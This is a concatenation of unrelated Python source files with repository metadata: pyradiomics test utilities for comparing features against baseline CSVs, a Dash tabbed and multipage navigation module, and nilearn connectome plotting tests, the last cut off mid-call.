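    utils.writeCSV(data, file_name)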
class PyRadiomicsBaseline:
def __init__(self, featureClassName):
self.logger = logging.getLogger('radiomics.testing.baseline')
self.cls = featureClassName
self.configuration = {}
self.baseline = {}
self.tests = set()
@classmethod
def readBaselineFile(cls, baselineFile):
featureClassName = os.path.basename(baselineFile)[9:-4]
new_baseline = cls(featureClassName)
new_baseline.logger.debug('Reading baseline for class %s', new_baseline.cls)
with open(baselineFile, 'r' if six.PY3 else 'rb') as baselineReader:
csvReader = csv.reader(baselineReader)
tests = six.next(csvReader)[1:]
for case in tests:
new_baseline.configuration[case] = {}
new_baseline.baseline[case] = {}
for testRow in csvReader:
for case_idx, case in enumerate(tests, start=1):
if 'general_info' in testRow[0]:
new_baseline.configuration[case][testRow[0]] = testRow[case_idx]
else:
new_baseline.baseline[case][testRow[0]] = testRow[case_idx]
new_baseline.tests = set(tests)
return new_baseline
def getTestConfig(self, test):
if test not in self.configuration:
return {} # This test is not present in the baseline for this class
config = {
'TestCase': self.configuration[test].get('general_info_TestCase', None),
'Settings': ast.literal_eval(self.configuration[test].get('general_info_GeneralSettings', '{}')),
}
if 'general_info_ImageHash' in self.configuration[test]:
config['ImageHash'] = self.configuration[test]['general_info_ImageHash']
if 'general_info_MaskHash' in self.configuration[test]:
config['MaskHash'] = self.configuration[test]['general_info_MaskHash']
if config['TestCase'] is None:
self.logger.error('Missing key "general_info_TestCase". Cannot configure!')
return None
return config
def getTestFeatures(self, test):
"""
Gets all features for which a baseline value is available for the current class and test case. Returns a list
containing the feature names.
"""
if test not in self.baseline:
return None # This test is not present in the baseline for this class
return list(self.baseline[test].keys())
def getBaselineValue(self, test, featureName):
if test not in self.baseline:
return None
return self.baseline[test].get(featureName, None)
def writeBaselineFile(self, baselineDir):
baselineFile = os.path.join(baselineDir, 'baseline_%s.csv' % self.cls)
testCases = list(self.baseline.keys())
with open(baselineFile, 'w' if six.PY3 else 'wb') as baseline:
csvWriter = csv.writer(baseline)
header = ['featureName'] + testCases
csvWriter.writerow(header)
config = self.configuration[testCases[0]].keys()
for c in config:
row = [c]
for testCase in testCases:
row.append(str(self.configuration[testCase].get(c, '')))
csvWriter.writerow(row)
features = self.baseline[testCases[0]].keys()
for f in features:
row = [f]
for testCase in testCases:
row.append(str(self.baseline[testCase].get(f, '')))
csvWriter.writerow(row)
| 36.228792
| 122
| 0.67679
|
import ast
import csv
import logging
import math
import os
from nose_parameterized import parameterized
import numpy
import SimpleITK as sitk
import six
from radiomics import getTestCase, imageoperations
logger = logging.getLogger('radiomics.testing')
TEST_CASES = ('brain1', 'brain2', 'breast1', 'lung1', 'lung2')
def custom_name_func(testcase_func, param_num, param):
global logger
logger.debug('custom_name_func: function name = %s, param_num = {0:0>3}, param.args = %s'.format(param_num),
testcase_func.__name__, param.args)
return str("%s_%s" % (
testcase_func.__name__,
parameterized.to_safe_name("_".join(str(x) for x in param.args)),
))
class RadiomicsTestUtils:
def __init__(self):
self._logger = logging.getLogger('radiomics.testing.utils')
self._logger.debug('RadiomicsTestUtils')
self._image = None
self._mask = None
self._current_image = None
self._current_mask = None
self._bb = None
self._imageType = None
self._dataDir = os.path.join(os.path.dirname(os.path.abspath(__file__)), "..", "data")
self._baselineDir = os.path.join(self._dataDir, 'baseline')
self._tests = set()
self._test = None
self._testCase = None
self._testedSet = set()
self._baseline = {}
self.readBaselineFiles()
self._current_config = {}
self._featureClassName = None
self._results = {}
self._diffs = {}
for test in self.getTests():
self._results[test] = {}
self._diffs[test] = {}
def readBaselineFiles(self):
baselineFiles = [fileName for fileName in os.listdir(self._baselineDir)
if os.path.isfile(os.path.join(self._baselineDir, fileName)) and fileName.startswith('baseline_')]
assert len(baselineFiles) > 0
for baselineFile in baselineFiles:
newBaseline = PyRadiomicsBaseline.readBaselineFile(os.path.join(self._baselineDir, baselineFile))
cls = newBaseline.cls
self._logger.debug('Read baseline for class %s', cls)
self._baseline[cls] = newBaseline
self._tests |= newBaseline.tests
def getTests(self):
return self._tests
def getFeatureNames(self, className, test):
if className not in self._baseline:
return None
return self._baseline[className].getTestFeatures(test)
def setFeatureClassAndTestCase(self, className, test):
global TEST_CASES
if self._featureClassName == className and self._test == test:
return False
self._test = test
self._testedSet.add(self._test)
if self._featureClassName != className:
self._logger.debug('Setting feature class name to %s', className)
assert className in self._baseline.keys()
self._featureClassName = className
if self._current_config != self._baseline[className].getTestConfig(test):
self._current_config = self._baseline[className].getTestConfig(test)
self._testCase = None
if self._testCase != self._current_config['TestCase']:
self._testCase = self._current_config['TestCase']
self._logger.info("Reading the image and mask for test case %s", self._testCase)
assert self._current_config['TestCase'] in TEST_CASES
imageName, maskName = getTestCase(self._testCase)
assert imageName is not None
assert maskName is not None
self._image = sitk.ReadImage(imageName)
self._mask = sitk.ReadImage(maskName)
if 'ImageHash' in self._current_config:
assert sitk.Hash(self._image) == self._current_config['ImageHash']
if 'MaskHash' in self._current_config:
assert sitk.Hash(self._mask) == self._current_config['MaskHash']
settings = self._current_config.get('Settings', {})
interpolator = settings.get('interpolator', sitk.sitkBSpline)
resampledPixelSpacing = settings.get('resampledPixelSpacing', None)
if interpolator is not None and resampledPixelSpacing is not None:
self._image, self._mask = imageoperations.resampleImage(self._image,
self._mask,
resampledPixelSpacing,
interpolator,
settings.get('label', 1),
settings.get('padDistance', 5))
self._bb, correctedMask = imageoperations.checkMask(self._image, self._mask, **settings)
if correctedMask is not None:
self._mask = correctedMask
self._imageType = None
return True
def getImage(self, imageType):
if self._imageType != imageType:
self._applyFilter(imageType)
return self._current_image
def getMask(self, imageType):
if self._imageType != imageType:
self._applyFilter(imageType)
return self._current_mask
def _applyFilter(self, imageType):
if imageType == 'original':
self._current_image, self._current_mask = imageoperations.cropToTumorMask(self._image, self._mask, self._bb)
else:
raise NotImplementedError()
self._imageType = imageType
def getSettings(self):
return self._current_config.get('Settings', {})
def checkResult(self, featureName, value):
longName = '_'.join(featureName)
if value is None:
self._diffs[self._test][longName] = None
self._results[self._test][longName] = None
assert (value is not None)
if math.isnan(value):
self._diffs[self._test][longName] = numpy.nan
self._results[self._test][longName] = numpy.nan
assert (not math.isnan(value))
self._logger.debug('checkResults: featureName = %s', featureName)
self._results[self._test][longName] = value
baselineValue = self._baseline[self._featureClassName].getBaselineValue(self._test, longName)
assert baselineValue is not None
baselineValue = float(baselineValue)
self._logger.debug('checkResults: for featureName %s, got baseline value = %f', featureName, baselineValue)
if baselineValue == 0.0:
if value - baselineValue == 0.0:
percentDiff = 0.0
else:
percentDiff = 1.0
else:
percentDiff = abs(1.0 - (value / baselineValue))
self._diffs[self._test][longName] = percentDiff
if (percentDiff >= 0.03):
self._logger.error('checkResult %s, baseline value = %f, calculated = %f, diff = %f%%', featureName,
float(baselineValue), value, percentDiff * 100)
assert (percentDiff < 0.03)
def getResults(self):
return self._results
def getDiffs(self):
return self._diffs
def getDataDir(self):
return self._dataDir
def writeCSV(self, data, fileName):
if len(self._testedSet) > 0:
with open(fileName, 'w') as csvFile:
csvFileWriter = csv.writer(csvFile, lineterminator='\n')
testedCases = sorted(self._testedSet)
header = sorted(data[testedCases[0]].keys())
header = ['testCase'] + header
csvFileWriter.writerow(header)
for testCase in testedCases:
thisCase = data[testCase]
thisCase['testCase'] = testCase
row = []
for h in header:
row = row + [thisCase.get(h, "N/A")]
csvFileWriter.writerow(row)
self._logger.info('Wrote to file %s', fileName)
else:
self._logger.info('No test cases run, aborting file write to %s', fileName)
class PyRadiomicsBaseline:
def __init__(self, featureClassName):
self.logger = logging.getLogger('radiomics.testing.baseline')
self.cls = featureClassName
self.configuration = {}
self.baseline = {}
self.tests = set()
@classmethod
def readBaselineFile(cls, baselineFile):
featureClassName = os.path.basename(baselineFile)[9:-4]
new_baseline = cls(featureClassName)
new_baseline.logger.debug('Reading baseline for class %s', new_baseline.cls)
with open(baselineFile, 'r' if six.PY3 else 'rb') as baselineReader:
csvReader = csv.reader(baselineReader)
tests = six.next(csvReader)[1:]
for case in tests:
new_baseline.configuration[case] = {}
new_baseline.baseline[case] = {}
for testRow in csvReader:
for case_idx, case in enumerate(tests, start=1):
if 'general_info' in testRow[0]:
new_baseline.configuration[case][testRow[0]] = testRow[case_idx]
else:
new_baseline.baseline[case][testRow[0]] = testRow[case_idx]
new_baseline.tests = set(tests)
return new_baseline
def getTestConfig(self, test):
if test not in self.configuration:
return {}
config = {
'TestCase': self.configuration[test].get('general_info_TestCase', None),
'Settings': ast.literal_eval(self.configuration[test].get('general_info_GeneralSettings', '{}')),
}
if 'general_info_ImageHash' in self.configuration[test]:
config['ImageHash'] = self.configuration[test]['general_info_ImageHash']
if 'general_info_MaskHash' in self.configuration[test]:
config['MaskHash'] = self.configuration[test]['general_info_MaskHash']
if config['TestCase'] is None:
self.logger.error('Missing key "general_info_TestCase". Cannot configure!')
return None
return config
def getTestFeatures(self, test):
if test not in self.baseline:
return None
return list(self.baseline[test].keys())
def getBaselineValue(self, test, featureName):
if test not in self.baseline:
return None
return self.baseline[test].get(featureName, None)
def writeBaselineFile(self, baselineDir):
baselineFile = os.path.join(baselineDir, 'baseline_%s.csv' % self.cls)
testCases = list(self.baseline.keys())
with open(baselineFile, 'w' if six.PY3 else 'wb') as baseline:
csvWriter = csv.writer(baseline)
header = ['featureName'] + testCases
csvWriter.writerow(header)
config = self.configuration[testCases[0]].keys()
for c in config:
row = [c]
for testCase in testCases:
row.append(str(self.configuration[testCase].get(c, '')))
csvWriter.writerow(row)
features = self.baseline[testCases[0]].keys()
for f in features:
row = [f]
for testCase in testCases:
row.append(str(self.baseline[testCase].get(f, '')))
csvWriter.writerow(row)
| true
| true
|
790b1cc2ae9747fb1d318f5abee1e2f3ba74b24c
| 32
|
py
|
Python
|
hashedml/__init__.py
|
mtingers/hashedml
|
e87f25bec719c9cce13552abb15379f6e54e563a
|
[
"MIT"
] | 1
|
2022-01-09T10:41:42.000Z
|
2022-01-09T10:41:42.000Z
|
hashedml/__init__.py
|
mtingers/hashedml
|
e87f25bec719c9cce13552abb15379f6e54e563a
|
[
"MIT"
] | null | null | null |
hashedml/__init__.py
|
mtingers/hashedml
|
e87f25bec719c9cce13552abb15379f6e54e563a
|
[
"MIT"
] | null | null | null |
from hashedml.hashedml import *
| 16
| 31
| 0.8125
|
from hashedml.hashedml import *
| true
| true
|
790b1d0ff85b035438d20cac86138e09048cf9f7
| 13,863
|
py
|
Python
|
dash_charts/utils_app_with_navigation.py
|
KyleKing/dash_charts
|
8e3644505047fa85f3175f5bc55a2421cb0a19ea
|
[
"Unlicense"
] | 16
|
2020-02-22T00:51:54.000Z
|
2022-03-03T21:45:51.000Z
|
dash_charts/utils_app_with_navigation.py
|
KyleKing/dash_charts
|
8e3644505047fa85f3175f5bc55a2421cb0a19ea
|
[
"Unlicense"
] | 29
|
2020-06-29T22:14:00.000Z
|
2022-03-22T02:10:00.000Z
|
dash_charts/utils_app_with_navigation.py
|
KyleKing/dash_charts
|
8e3644505047fa85f3175f5bc55a2421cb0a19ea
|
[
"Unlicense"
] | 1
|
2022-02-03T09:07:07.000Z
|
2022-02-03T09:07:07.000Z
|
"""Classes for more complex applications that have tabbed or paged navigation."""
from collections import OrderedDict
from copy import deepcopy
import dash_bootstrap_components as dbc
import dash_core_components as dcc
import dash_html_components as html
from implements import implements
from .utils_app import AppBase, AppInterface
TODO_CLIENT_CALLBACK = '''
TODO: Create clientside callbacks dynamically to update the title on navigation
See: http://dash.plotly.com/external-resources
```py
app.clientside_callback(
"""
function(tab_value) {
if (tab_value === 'tab-1') {
document.title = 'Tab 1'
} else if (tab_value === 'tab-2') {
document.title = 'Tab 2'
}
}
""",
Output('blank-output', 'children'),
[Input('tabs-example', 'value')]
)
```
'''
# TODO: Try to see if I can resolve the interface differences or if I need to make a subclass interface
# @implements(AppInterface) # noqa: H601
class AppWithNavigation(AppBase):
"""Base class for building Dash Application with tabs or URL routing."""
app = None
"""Main Dash application to pass to all child tabs."""
nav_lookup = None
"""OrderedDict based on the list of tuples from `self.define_nav_elements()`."""
nav_layouts = None
"""Dictionary with nav_names as keys and corresponding layout as value."""
def define_nav_elements(self):
"""Return list of initialized pages or tabs accordingly.
Should return a list where each item is an initialized app (e.g. `[AppBase(self.app)]`), in the order each tab is rendered
Raises:
NotImplementedError: Child class must implement this method
"""
raise NotImplementedError('define_nav_elements must be implemented by child class') # pragma: no cover
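# Hedged sketch (added; the tab classes named below are hypothetical): a child
# class would typically override define_nav_elements() along these lines:
#
#   class MyTabbedApp(AppWithTabs):
#       name = 'My App'
#       def define_nav_elements(self):
#           return [FirstTab(self.app), SecondTab(self.app)]
#
# where FirstTab and SecondTab are AppBase subclasses with unique `name` values.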
def create(self, **kwargs):
"""Create each navigation componet, storing the layout. Then parent class to create application.
Args:
kwargs: keyword arguments passed to `self.create`
"""
# Initialize the lookup for each tab then configure each tab
self.nav_lookup = OrderedDict([(tab.name, tab) for tab in self.define_nav_elements()])
self.nav_layouts = {}
for nav_name, nav in self.nav_lookup.items():
nav.create(assign_layout=False)
self.nav_layouts[nav_name] = nav.return_layout()
# Store validation_layout that is later used for callback verification in base class
self.validation_layout = [*map(deepcopy, self.nav_layouts.values())]
# Initialize parent application that handles navigation
super().create(**kwargs)
def initialization(self) -> None:
"""Initialize ids with `self.register_uniq_ids([...])` and other one-time actions."""
super().initialization()
self.register_uniq_ids(self.app_ids)
def create_elements(self) -> None:
"""Override method as not needed at navigation-level."""
... # pragma: no cover
def create_callbacks(self) -> None:
"""Override method as not needed at navigation-level."""
... # pragma: no cover
@implements(AppInterface) # noqa: H601
class StaticTab(AppBase):
"""Simple App without charts or callbacks."""
basic_style = {
'marginLeft': 'auto',
'marginRight': 'auto',
'maxWidth': '1000px',
'paddingTop': '10px',
}
def initialization(self) -> None:
"""Initialize ids with `self.register_uniq_ids([...])` and other one-time actions."""
super().initialization()
self.register_uniq_ids(['N/A'])
def create_elements(self) -> None:
"""Initialize the charts, tables, and other Dash elements.."""
...
def create_callbacks(self) -> None:
"""Register callbacks necessary for this tab."""
...
class AppWithTabs(AppWithNavigation):
"""Base class for building Dash Application with tabs."""
# App ids
id_tabs_content = 'tabs-wrapper'
id_tabs_select = 'tabs-content'
app_ids = [id_tabs_content, id_tabs_select]
"""List of all ids for the top-level tab view. Will be mapped to `self._il` for globally unique ids."""
def return_layout(self) -> dict:
"""Return Dash application layout.
Returns:
dict: Dash HTML object
"""
tabs = [dcc.Tab(label=name, value=name) for name, tab in self.nav_lookup.items()]
return html.Div(
children=[
dcc.Tabs(
id=self._il[self.id_tabs_select], value=list(self.nav_lookup.keys())[0],
children=tabs,
),
html.Div(id=self._il[self.id_tabs_content]),
],
)
def create_callbacks(self) -> None:
"""Register the navigation callback."""
outputs = [(self.id_tabs_content, 'children')]
inputs = [(self.id_tabs_select, 'value')]
@self.callback(outputs, inputs, [])
def render_tab(tab_name):
return [self.nav_layouts[tab_name]]
# > PLANNED: Make the tabs and chart compact as well when the compact argument is set to True
class FullScreenAppWithTabs(AppWithTabs): # noqa: H601
"""Base class for building Dash Application with tabs that uses the full window."""
tabs_location = 'left'
"""Tab orientation setting. One of `(left, top, bottom, right)`."""
tabs_margin = '10%'
"""Adjust this setting based on the width or height of the tabs to prevent the content from overlapping the tabs."""
tabs_compact = False
"""Boolean setting to toggle between a padded tab layout if False and a minimal compact version if True."""
def verify_app_initialization(self):
"""Check that the app was properly initialized.
Raises:
RuntimeError: if child class has not called `self.register_uniq_ids`
"""
super().verify_app_initialization()
allowed_locations = ('left', 'top', 'bottom', 'right')
if self.tabs_location not in allowed_locations: # pragma: no cover
raise RuntimeError(f'`self.tabs_location = {self.tabs_location}` is not in {allowed_locations}')
def return_layout(self) -> dict:
"""Return Dash application layout.
Returns:
dict: Dash HTML object
"""
return html.Div(
children=[
self.tab_menu(),
html.Div(
style={f'margin-{self.tabs_location}': self.tabs_margin},
children=[html.Div(id=self._il[self.id_tabs_content])],
),
],
)
def generate_tab_kwargs(self):
"""Create the tab keyword arguments. Intended to be modified through inheritance.
Returns:
tuple: keyword arguments and styling for the dcc.Tab elements
- tab_kwargs: with at minimum keys `(style, selected_style)` for dcc.Tab
- tabs_kwargs: to be passed to dcc.Tabs
- tabs_style: style for the dcc.Tabs HTML element
"""
# Unselected tab style
if self.tabs_compact:
tab_style = {'padding': '2px 4px 2px 4px'}
tabs_padding = '6px 0 0 2px'
else:
tab_style = {'padding': '10px 20px 10px 20px'}
tabs_padding = '15px 0 0 5px'
# Extend tab style for selected case
selected_style = deepcopy(tab_style)
opposite_lookup = {'top': 'bottom', 'bottom': 'top', 'left': 'right', 'right': 'left'}
tabs_style = { # noqa: ECE001
'backgroundColor': '#F9F9F9',
'padding': tabs_padding,
'position': 'fixed',
'zIndex': '999',
f'border{opposite_lookup[self.tabs_location].title()}': '1px solid #d6d6d6',
self.tabs_location: '0',
}
if self.tabs_location in ['left', 'right']:
# Configure for vertical case
selected_style['border-left'] = '3px solid #119DFF'
tabs_kwargs = {
'vertical': True,
'style': {'width': '100%'},
'parent_style': {'width': '100%'},
}
tabs_style['top'] = '0'
tabs_style['bottom'] = '0'
tabs_style['width'] = 'auto'
else:
# Configure for horizontal case
selected_style['border-top'] = '3px solid #119DFF'
tabs_kwargs = {}
tabs_style['height'] = 'auto'
tabs_style['right'] = '0'
tabs_style['left'] = '0'
tab_kwargs = {'style': tab_style, 'selected_style': selected_style}
return (tab_kwargs, tabs_kwargs, tabs_style)
def tab_menu(self):
"""Return the HTML elements for the tab menu.
Returns:
dict: Dash HTML object
"""
tab_kwargs, tabs_kwargs, tabs_style = self.generate_tab_kwargs()
tabs = [dcc.Tab(label=name, value=name, **tab_kwargs) for name, tab in self.nav_lookup.items()]
return html.Div(
children=[
dcc.Tabs(
id=self._il[self.id_tabs_select], value=list(self.nav_lookup.keys())[0],
children=tabs, **tabs_kwargs,
),
], style=tabs_style,
)
class AppMultiPage(AppWithNavigation): # noqa: H601
"""Base class for building Dash Application with multiple pages."""
navbar_links = None
"""Base class must create list of tuples `[('Link Name', '/link'), ]` to use default `self.nav_bar()`."""
dropdown_links = None
"""Base class must create list of tuples `[('Link Name', '/link'), ]` to use default `self.nav_bar()`."""
logo = None
"""Optional path to logo. If None, no logo will be shown in navbar."""
# App ids
id_url = 'pages-url'
id_pages_content = 'pages-wrapper'
id_toggler = 'nav-toggle'
id_collapse = 'nav-collapse'
app_ids = [id_url, id_pages_content, id_toggler, id_collapse]
"""List of all ids for the top-level pages view. Will be mapped to `self._il` for globally unique ids."""
def return_layout(self) -> dict:
"""Return Dash application layout.
Returns:
dict: Dash HTML object
"""
return html.Div(
children=[
dcc.Location(id=self._il[self.id_url], refresh=False),
self.nav_bar(),
html.Div(id=self._il[self.id_pages_content]),
],
)
def nav_bar(self):
"""Return the HTML elements for the navigation menu.
Returns:
dict: Dash HTML object
"""
# Create brand icon and name where icon in optional
brand = []
if self.logo:
brand.append(dbc.Col(html.Img(src=self.logo, height='25px')))
brand.append(dbc.Col(dbc.NavbarBrand(self.name, className='ml-2')))
# Create links in navbar and dropdown. Both are optional
links = []
if self.navbar_links:
links.append(
dbc.Nav(
children=[dbc.NavItem(dbc.NavLink(name, href=link)) for name, link in self.navbar_links],
fill=True,
navbar=True,
),
)
if self.dropdown_links:
links.append(
dbc.Nav(
dbc.DropdownMenu(
children=[dbc.DropdownMenuItem(name, href=link) for name, link in self.dropdown_links],
in_navbar=True,
label='Links',
nav=True,
),
navbar=True,
),
)
# Layout default navbar
return dbc.Navbar(
children=[
dbc.NavLink(
[
dbc.Row(
children=brand,
align='center',
no_gutters=True,
),
], href='/',
),
dbc.NavbarToggler(id=self._il[self.id_toggler]),
dbc.Collapse(
dbc.Row(
children=links,
no_gutters=True,
className='flex-nowrap mt-3 mt-md-0',
align='center',
),
id=self._il[self.id_collapse],
navbar=True,
),
],
sticky='top',
color='dark',
dark=True,
)
def create_callbacks(self) -> None:
"""Register the navigation callback."""
outputs = [(self.id_pages_content, 'children')]
inputs = [(self.id_url, 'pathname')]
@self.callback(outputs, inputs, [])
def render_page(pathname):
try:
# TODO: Demo how pages could use parameters from pathname
return [self.nav_layouts[self.select_page_name(pathname)]]
except Exception as err:
return [html.Div(children=[f'Error rendering "{pathname}":\n{err}'])]
@self.callback(
[(self.id_collapse, 'is_open')],
[(self.id_toggler, 'n_clicks')],
[(self.id_collapse, 'is_open')],
)
def toggle_navbar_collapse(n_clicks, is_open):
return [not is_open if n_clicks else is_open]
def select_page_name(self, pathname):
"""Return the page name determined based on the pathname.
Should return str: page name
Args:
pathname: relative pathname from URL
Raises:
NotImplementedError: Child class must implement this method
"""
raise NotImplementedError('nav_bar must be implemented by child class') # pragma: no cover
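# Hedged sketch (added; the page names and routes are hypothetical): a child of
# AppMultiPage typically maps the URL path onto one of the nav names returned by
# define_nav_elements(), e.g.:
#
#   def select_page_name(self, pathname):
#       return {'/': 'Home', '/data': 'Data'}.get(pathname, 'Home')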
| 34.571072
| 120
| 0.572098
|
from collections import OrderedDict
from copy import deepcopy
import dash_bootstrap_components as dbc
import dash_core_components as dcc
import dash_html_components as html
from implements import implements
from .utils_app import AppBase, AppInterface
TODO_CLIENT_CALLBACK = '''
TODO: Create clientside callbacks dynamically to update the title on navigation
See: http://dash.plotly.com/external-resources
```py
app.clientside_callback(
"""
function(tab_value) {
if (tab_value === 'tab-1') {
document.title = 'Tab 1'
} else if (tab_value === 'tab-2') {
document.title = 'Tab 2'
}
}
""",
Output('blank-output', 'children'),
[Input('tabs-example', 'value')]
)
```
'''
class AppWithNavigation(AppBase):
app = None
nav_lookup = None
nav_layouts = None
def define_nav_elements(self):
raise NotImplementedError('define_nav_elements must be implemented by child class')
def create(self, **kwargs):
self.nav_lookup = OrderedDict([(tab.name, tab) for tab in self.define_nav_elements()])
self.nav_layouts = {}
for nav_name, nav in self.nav_lookup.items():
nav.create(assign_layout=False)
self.nav_layouts[nav_name] = nav.return_layout()
self.validation_layout = [*map(deepcopy, self.nav_layouts.values())]
super().create(**kwargs)
def initialization(self) -> None:
super().initialization()
self.register_uniq_ids(self.app_ids)
def create_elements(self) -> None:
...
def create_callbacks(self) -> None:
...
@implements(AppInterface)
class StaticTab(AppBase):
basic_style = {
'marginLeft': 'auto',
'marginRight': 'auto',
'maxWidth': '1000px',
'paddingTop': '10px',
}
def initialization(self) -> None:
super().initialization()
self.register_uniq_ids(['N/A'])
def create_elements(self) -> None:
...
def create_callbacks(self) -> None:
...
class AppWithTabs(AppWithNavigation):
id_tabs_content = 'tabs-wrapper'
id_tabs_select = 'tabs-content'
app_ids = [id_tabs_content, id_tabs_select]
def return_layout(self) -> dict:
tabs = [dcc.Tab(label=name, value=name) for name, tab in self.nav_lookup.items()]
return html.Div(
children=[
dcc.Tabs(
id=self._il[self.id_tabs_select], value=list(self.nav_lookup.keys())[0],
children=tabs,
),
html.Div(id=self._il[self.id_tabs_content]),
],
)
def create_callbacks(self) -> None:
outputs = [(self.id_tabs_content, 'children')]
inputs = [(self.id_tabs_select, 'value')]
@self.callback(outputs, inputs, [])
def render_tab(tab_name):
return [self.nav_layouts[tab_name]]
class FullScreenAppWithTabs(AppWithTabs):
tabs_location = 'left'
tabs_margin = '10%'
tabs_compact = False
def verify_app_initialization(self):
super().verify_app_initialization()
allowed_locations = ('left', 'top', 'bottom', 'right')
if self.tabs_location not in allowed_locations:
raise RuntimeError(f'`self.tabs_location = {self.tabs_location}` is not in {allowed_locations}')
def return_layout(self) -> dict:
return html.Div(
children=[
self.tab_menu(),
html.Div(
style={f'margin-{self.tabs_location}': self.tabs_margin},
children=[html.Div(id=self._il[self.id_tabs_content])],
),
],
)
def generate_tab_kwargs(self):
if self.tabs_compact:
tab_style = {'padding': '2px 4px 2px 4px'}
tabs_padding = '6px 0 0 2px'
else:
tab_style = {'padding': '10px 20px 10px 20px'}
tabs_padding = '15px 0 0 5px'
selected_style = deepcopy(tab_style)
opposite_lookup = {'top': 'bottom', 'bottom': 'top', 'left': 'right', 'right': 'left'}
tabs_style = {
'backgroundColor': '#F9F9F9',
'padding': tabs_padding,
'position': 'fixed',
'zIndex': '999',
f'border{opposite_lookup[self.tabs_location].title()}': '1px solid #d6d6d6',
self.tabs_location: '0',
}
if self.tabs_location in ['left', 'right']:
selected_style['border-left'] = '3px solid #119DFF'
tabs_kwargs = {
'vertical': True,
'style': {'width': '100%'},
'parent_style': {'width': '100%'},
}
tabs_style['top'] = '0'
tabs_style['bottom'] = '0'
tabs_style['width'] = 'auto'
else:
selected_style['border-top'] = '3px solid #119DFF'
tabs_kwargs = {}
tabs_style['height'] = 'auto'
tabs_style['right'] = '0'
tabs_style['left'] = '0'
tab_kwargs = {'style': tab_style, 'selected_style': selected_style}
return (tab_kwargs, tabs_kwargs, tabs_style)
def tab_menu(self):
tab_kwargs, tabs_kwargs, tabs_style = self.generate_tab_kwargs()
tabs = [dcc.Tab(label=name, value=name, **tab_kwargs) for name, tab in self.nav_lookup.items()]
return html.Div(
children=[
dcc.Tabs(
id=self._il[self.id_tabs_select], value=list(self.nav_lookup.keys())[0],
children=tabs, **tabs_kwargs,
),
], style=tabs_style,
)
class AppMultiPage(AppWithNavigation):
navbar_links = None
dropdown_links = None
logo = None
id_url = 'pages-url'
id_pages_content = 'pages-wrapper'
id_toggler = 'nav-toggle'
id_collapse = 'nav-collapse'
app_ids = [id_url, id_pages_content, id_toggler, id_collapse]
def return_layout(self) -> dict:
return html.Div(
children=[
dcc.Location(id=self._il[self.id_url], refresh=False),
self.nav_bar(),
html.Div(id=self._il[self.id_pages_content]),
],
)
def nav_bar(self):
brand = []
if self.logo:
brand.append(dbc.Col(html.Img(src=self.logo, height='25px')))
brand.append(dbc.Col(dbc.NavbarBrand(self.name, className='ml-2')))
links = []
if self.navbar_links:
links.append(
dbc.Nav(
children=[dbc.NavItem(dbc.NavLink(name, href=link)) for name, link in self.navbar_links],
fill=True,
navbar=True,
),
)
if self.dropdown_links:
links.append(
dbc.Nav(
dbc.DropdownMenu(
children=[dbc.DropdownMenuItem(name, href=link) for name, link in self.dropdown_links],
in_navbar=True,
label='Links',
nav=True,
),
navbar=True,
),
)
return dbc.Navbar(
children=[
dbc.NavLink(
[
dbc.Row(
children=brand,
align='center',
no_gutters=True,
),
], href='/',
),
dbc.NavbarToggler(id=self._il[self.id_toggler]),
dbc.Collapse(
dbc.Row(
children=links,
no_gutters=True,
className='flex-nowrap mt-3 mt-md-0',
align='center',
),
id=self._il[self.id_collapse],
navbar=True,
),
],
sticky='top',
color='dark',
dark=True,
)
def create_callbacks(self) -> None:
outputs = [(self.id_pages_content, 'children')]
inputs = [(self.id_url, 'pathname')]
@self.callback(outputs, inputs, [])
def render_page(pathname):
try:
return [self.nav_layouts[self.select_page_name(pathname)]]
except Exception as err:
return [html.Div(children=[f'Error rendering "{pathname}":\n{err}'])]
@self.callback(
[(self.id_collapse, 'is_open')],
[(self.id_toggler, 'n_clicks')],
[(self.id_collapse, 'is_open')],
)
def toggle_navbar_collapse(n_clicks, is_open):
return [not is_open if n_clicks else is_open]
def select_page_name(self, pathname):
raise NotImplementedError('nav_bar must be implemented by child class')
| true
| true
|
790b1d3cfe2d90ff414474016128db749d607913
| 8,330
|
py
|
Python
|
nilearn/plotting/tests/test_html_connectome.py
|
ryanhammonds/nilearn
|
f33cd4e4685d9050e5bba0a8ece1b0b0f0ad1be2
|
[
"BSD-2-Clause"
] | null | null | null |
nilearn/plotting/tests/test_html_connectome.py
|
ryanhammonds/nilearn
|
f33cd4e4685d9050e5bba0a8ece1b0b0f0ad1be2
|
[
"BSD-2-Clause"
] | null | null | null |
nilearn/plotting/tests/test_html_connectome.py
|
ryanhammonds/nilearn
|
f33cd4e4685d9050e5bba0a8ece1b0b0f0ad1be2
|
[
"BSD-2-Clause"
] | 1
|
2017-08-26T08:19:29.000Z
|
2017-08-26T08:19:29.000Z
|
import warnings
import numpy as np
from nilearn.plotting import cm
from nilearn.plotting.js_plotting_utils import decode
from nilearn.plotting import html_connectome
from .test_js_plotting_utils import check_html
def test_prepare_line():
e = np.asarray([0, 1, 2, 3], dtype=int)
n = np.asarray([[0, 1], [0, 2], [2, 3], [8, 9]], dtype=int)
pe, pn = html_connectome._prepare_line(e, n)
assert (pn == [0, 1, 0, 0, 2, 0, 2, 3, 0, 8, 9, 0]).all()
assert(pe == [0, 0, 0, 1, 1, 0, 2, 2, 0, 3, 3, 0]).all()
def _make_connectome():
adj = np.diag([1.5, .3, 2.5], 2)
adj += adj.T
adj += np.eye(5)
coord = np.arange(5)
coord = np.asarray([coord * 10, -coord, coord[::-1]]).T
return adj, coord
def test_get_connectome():
adj, coord = _make_connectome()
connectome = html_connectome._get_connectome(adj, coord)
con_x = decode(connectome['_con_x'], '<f4')
expected_x = np.asarray(
[0, 0, 0,
0, 20, 0,
10, 10, 0,
10, 30, 0,
20, 0, 0,
20, 20, 0,
20, 40, 0,
30, 10, 0,
30, 30, 0,
40, 20, 0,
40, 40, 0], dtype='<f4')
assert (con_x == expected_x).all()
assert {'_con_x', '_con_y', '_con_z', '_con_w', 'colorscale'
}.issubset(connectome.keys())
assert (connectome['cmin'], connectome['cmax']) == (-2.5, 2.5)
adj[adj == 0] = np.nan
connectome = html_connectome._get_connectome(adj, coord)
con_x = decode(connectome['_con_x'], '<f4')
assert (con_x == expected_x).all()
assert (connectome['cmin'], connectome['cmax']) == (-2.5, 2.5)
def test_view_connectome():
adj, coord = _make_connectome()
html = html_connectome.view_connectome(adj, coord)
check_html(html, False, 'connectome-plot')
html = html_connectome.view_connectome(adj, coord, '85.3%',
title="SOME_TITLE")
check_html(html, False, 'connectome-plot')
assert "SOME_TITLE" in html.html
html = html_connectome.view_connectome(adj, coord, '85.3%',
linewidth=8.5, node_size=4.2)
